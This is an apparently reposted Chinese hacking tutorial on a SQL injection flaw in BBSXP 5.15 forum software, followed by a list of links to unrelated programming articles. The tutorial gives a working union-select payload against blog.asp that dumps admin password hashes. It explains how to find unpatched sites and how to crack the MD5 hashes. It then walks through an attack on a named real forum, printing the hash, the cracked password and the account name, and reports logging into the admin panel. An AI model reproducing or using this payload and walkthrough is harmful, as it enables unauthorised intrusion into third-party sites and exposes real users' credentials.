BBSXP5.15最新漏洞精简版

首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP 可以让直接构造数据库命令

blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]

后台区长的md5密码就显示出来了。

前台密码也可以出来,

网上已经有相关动画,软件。

就利用这个漏洞,肯定有一批bbsxp的网站要倒下了

接下来就是讲工具了,准备好MD5密码破解器

关于md5的破解,比较好使的有md5cracker速度增强版。

1。先用8位或9位数字跑。很快。

2。如果不行,用小写字母跑。选择5-6位比较好。

3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的,

跑上及几个小时。(你的机器配置必须很好)

4。再不行,建议放弃,太变态了。

前台ok...后台密码..(注:你必须知道管理员的帐号)

直接默认的配置就是直接拿下后台密码...

直接吧前台md5密码暴出来。

剩下的事就事破解md5了。

现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]

就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]

他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作

按照上面工具的介绍先用数字把,

正在破===耐心等等

我接条信息,大家不介意把~

出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。

bBsxp5.15最新漏洞的原始作者不清

(0)

相关推荐

  • BBSXP5.15最新漏洞精简版

    首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP 可以让直接构造数据库命令 blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 后台区长的md5密码就显示出来了. 前台密

  • mysql 8.0.15 winx64解压版安装配置方法图文教程

    本文为大家分享了mysql 8.0.15 winx64解压版安装配置方法,供大家参考,具体内容如下 本地测试需要,安装MySQL最新版本,中间出现两处小问题,解决之,记录之. 1.官网下载,并解压 下载地址 2.设置环境变量 配置MYSQL_HOME为MySQL的解压路径,并在path设置;%MYSQL_HOME%\bin 3.在MySQL解压路径下,新建my.ini 配置初始化参数: [mysql] # 设置mysql客户端默认字符集 default-character-set=utf8 [m

  • .net 6精简版webapi教程及热重载、代码自动反编译演示

    .net 6精简版webapi教程及热重载、代码自动反编译演示

    前言: .net6LTS版本发布已经有若干天了.此处做一个关于使用.net6开发精简版webapi(minimalapi)的入门教程,以及VS2022上面的两个强大的新技能(热重载.代码自动反编译)的顺带演示. 1.新建一个项目.此处就命名为SomeExample: 2.选择.net6版本,并且此处先去掉HTTPS配置以及去掉使用控制器的选项: 3.创建完成以后,原始画面如下所示.并且,解决方案一栏只剩下program文件,其他文件都被精简掉了.并且没有Main函数入口和命名空间等. 4.接下来

  • sql server 2008 r2 express 精简版与企业版的区别

    sql server 2008 r2 express是什么版本 express是精简版的意思 r2是2008的第2版本,推荐使用. SQL Server Express 2008 r2 可以理解为 "学习版", 就是 没有某些 高级的功能, 但是用于 学习 SQL , 以及 简单的使用, 是足够了.微软网站,免费下载的.sql server 2008 r2 可以理解为 "专业版" 或者 "企业版", 具备一些高级的功能.是要付费的.公司使用的话,

  • Java 实现文件批量重命名亲测可用(精简版)

    Java 实现文件批量重命名亲测可用(精简版)

    之前在网上下载了很多视频,解压缩后,发现里面每个文件前面都有一长串的网址,导致我根本看不清每个视频的名字到底叫什么? 网上搜了一些批量重命名的方法,可都不是我想要的,既然这样,干脆自己动手用Java写一个吧.测了一下应该没问题,现在分享出来. 先上代码: import java.io.File; import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; /** * 重命名规则类 * @author ja

  • oracle 10g 精简版安装步骤分享

    今天遇到个软件要求安装oracle client端,于是考虑装精简版本的,就从http://www.oracle.com/technology/software/tech/oci/instantclient/index.html下载了instantclient-basic-win32-10.2.0.4.zip,该版本支持多种语言的.虽然最终精简版是安装成功了,但是该软件还是没有办法使用,估计精简版中没有它需要的文件.不过由此学会了装精简版还是不错地,呵呵!现将精简版的安装步骤如下写出来: 1-把

  • MySQL 5.0.96 for Windows x86 32位绿色精简版安装教程

    MySQL 5.0 因为"高级功能"少而成为一代经典,此为MySQL 5.0.96 for Windows x86 32位.精简后就只有几M,没办法.Microsoft Visual C++ 2005 Redistributable自行安装. 一.ibdata1: 1. INNODB类型表的数据 2. master slave服务器 删除.如果使用INNODB引擎会重建. 二.ib_logfile0和ib_logfile1: INNODB类型表的错误日志 删除.如果使用INNODB引擎

  • Vue精简版风格指南(推荐)

    前面的话 Vue官网的风格指南按照优先级(依次为必要.强烈推荐.推荐.谨慎使用)分类,且代码间隔较大,不易查询.本文按照类型分类,并对部分示例或解释进行缩减,是Vue风格指南的精简版 组件名称 [组件名为多个单词](必要) 组件名应该始终是多个单词的,根组件 App 除外. 这样做可以避免跟现有的以及未来的 HTML 元素相冲突,因为所有的 HTML 元素名称都是单个单词的 //bad Vue.component('todo', {}) //good Vue.component('todo-it

  • C语言实现抢红包程序代码精简版

    本文实例为大家分享了Android九宫格图片展示的具体代码,供大家参考,具体内容如下 其实这是段相当简单的代码,至于为什么还要把它放在博客上呢,主要是针对那些刚入门学编程的同学(或者是对程序感兴趣的同学),一个比较直观的程序(小游戏)或许更能培养他们的兴趣,或是说更能使他们对编程满怀热情.首先我自己也是从那个阶段过来的,对于老师上课讲得知识很迷茫,不知道熟悉一些运算符,语句,结构有什么用,该怎么用,于是自己摸索着找了几个实例练练手,在练习的过程就逐步掌握了老师讲的知识,自己对编程也更感兴趣了.下

  • Vue精简版风格概述

    前面的话 Vue官网的风格指南按照优先级(依次为必要.强烈推荐.推荐.谨慎使用)分类,且代码间隔较大,不易查询.本文按照类型分类,并对部分示例或解释进行缩减,是Vue风格指南的精简版 组件名称 [组件名为多个单词](必要) 组件名应该始终是多个单词的,根组件 App 除外. 这样做可以避免跟现有的以及未来的 HTML 元素相冲突,因为所有的 HTML 元素名称都是单个单词的 //bad Vue.component('todo', {})//good Vue.component('todo-ite

随机推荐